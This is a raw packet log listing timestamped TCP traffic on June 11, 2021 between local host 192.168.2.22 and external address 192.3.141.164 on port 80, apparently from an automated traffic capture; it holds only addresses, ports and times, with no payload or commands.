Jun 11, 2021 15:59:28.551235914 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551251888 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551266909 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551300049 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551309109 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551342010 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551358938 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551379919 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551393986 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551418066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551439047 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551457882 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551471949 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551495075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551513910 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551532030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551548958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551569939 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551588058 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551618099 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551624060 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551661015 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551677942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551700115 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551734924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551739931 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551757097 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551779032 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551815033 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551855087 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551888943 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551893950 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551940918 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.551942110 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551949978 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551955938 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551961899 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.551984072 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552006006 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552021027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552030087 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552061081 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552079916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552098989 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552115917 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552135944 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552155972 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552176952 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552206993 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552213907 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552220106 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552261114 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552268028 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552304983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552326918 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552340984 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552356958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552381039 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552400112 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552419901 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552442074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552459002 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552498102 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552499056 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552514076 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552536011 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552575111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552583933 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552591085 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552624941 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552656889 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552663088 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552680016 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552701950 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552738905 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552745104 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552763939 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552778006 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552793026 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552817106 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552831888 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552855015 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552874088 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552902937 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552911997 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.552943945 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552982092 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.552987099 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553004026 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553020000 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553030014 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553057909 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553095102 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553133011 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553159952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553170919 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553170919 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553206921 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553210974 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553216934 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553258896 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553260088 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553277016 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553296089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553335905 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553339958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553360939 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553375006 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553390980 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553421974 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553431988 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553459883 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553479910 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553498030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553510904 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553534031 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553561926 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553575039 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553582907 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553618908 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553636074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553667068 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553678989 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553709030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553725004 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553745985 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553772926 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553803921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553814888 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553847075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553863049 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553884983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553903103 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553924084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553942919 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553962946 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.553982973 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.553999901 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554023027 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554039001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554052114 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554074049 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554090977 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554121971 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554132938 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554162979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554176092 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554202080 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554222107 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554240942 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554260015 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554279089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554295063 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554315090 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554335117 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554353952 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554363966 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554392099 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554409027 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554440975 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554450035 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554490089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554506063 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554533958 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554548979 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554573059 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554593086 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554610968 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554630995 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554647923 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554672956 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554687023 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554723978 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554724932 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554743052 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554773092 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554775953 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554815054 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554831028 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554852962 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554871082 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554892063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554908991 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554929972 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.554950953 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.554986000 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684005976 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684066057 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684098005 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684103966 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684134007 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684143066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684160948 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684184074 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684204102 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684222937 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684254885 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684261084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684273005 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684300900 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684329987 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684343100 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684350967 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684393883 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684432030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684434891 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684457064 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684474945 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684508085 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684514999 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684518099 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684554100 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684583902 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684593916 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684597969 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684632063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684654951 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684679985 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684695959 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684721947 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684742928 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684760094 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684788942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684799910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684814930 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684839964 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684859037 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684878111 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684916973 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684917927 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684931040 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.684954882 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.684977055 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685002089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685008049 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685045004 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685061932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685082912 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685106039 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685121059 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685146093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685158968 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685185909 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685197115 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685216904 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685234070 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685254097 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685273886 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685297012 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685321093 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685328007 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685363054 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685383081 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685400009 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685424089 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685437918 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685463905 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685480118 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685517073 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685519934 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685539007 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685555935 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685559034 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685592890 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685630083 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685640097 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685642958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685682058 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685709953 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685719013 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685749054 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685780048 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685810089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685847998 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685853958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685869932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685878992 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685883999 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685894012 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685928106 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685936928 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.685939074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685951948 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.685973883 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686007977 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686012983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686023951 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686049938 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686074972 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686086893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686093092 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686125994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686150074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686162949 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686163902 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686212063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.686219931 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.686271906 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688548088 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688591957 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688630104 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688636065 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688654900 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688666105 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688679934 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688705921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688733101 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688745975 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688746929 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688793898 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688808918 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688836098 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688863039 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688874006 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688890934 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688911915 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688935995 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688951015 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.688970089 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.688987970 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689009905 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689026117 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689050913 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689063072 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689089060 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689110041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689114094 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689151049 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689172983 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689188957 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689213037 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689227104 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689254045 CEST	49174	80	192.168.2.22	192.3.141.164
